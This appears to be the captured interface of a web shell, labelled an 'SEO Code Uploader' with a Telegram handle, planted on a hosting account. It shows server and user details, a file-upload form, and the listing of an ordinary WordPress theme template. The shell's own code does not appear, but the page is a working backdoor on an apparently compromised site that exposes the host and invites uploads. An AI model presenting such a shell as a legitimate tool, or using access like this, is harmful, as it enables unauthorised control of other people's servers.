Sid Gifari SEO Code Uplaoder

Sid Gifari SEO Code Uplaoder

Telegram:sidgifari

Upload File:
HEX
HEX
Server: LiteSpeed
System: Linux premium311.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: scepbisv (1262)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/scepbisv/public_html/wp-content/themes/dt-the7/template-microsite.php
<?php
/**
 * Template Name: Microsite
 *
 * Template Post Type: post, page, dt_portfolio
 *
 * @since   3.0.0
 *
 * @package The7\Templates
 */

defined( 'ABSPATH' ) || exit;

presscore_config()->set( 'template', 'microsite' );
get_header();

if ( presscore_is_content_visible() ) {
	presscore_get_template_part( 'theme', 'microsite/microsite', get_post_type() );
}

get_footer();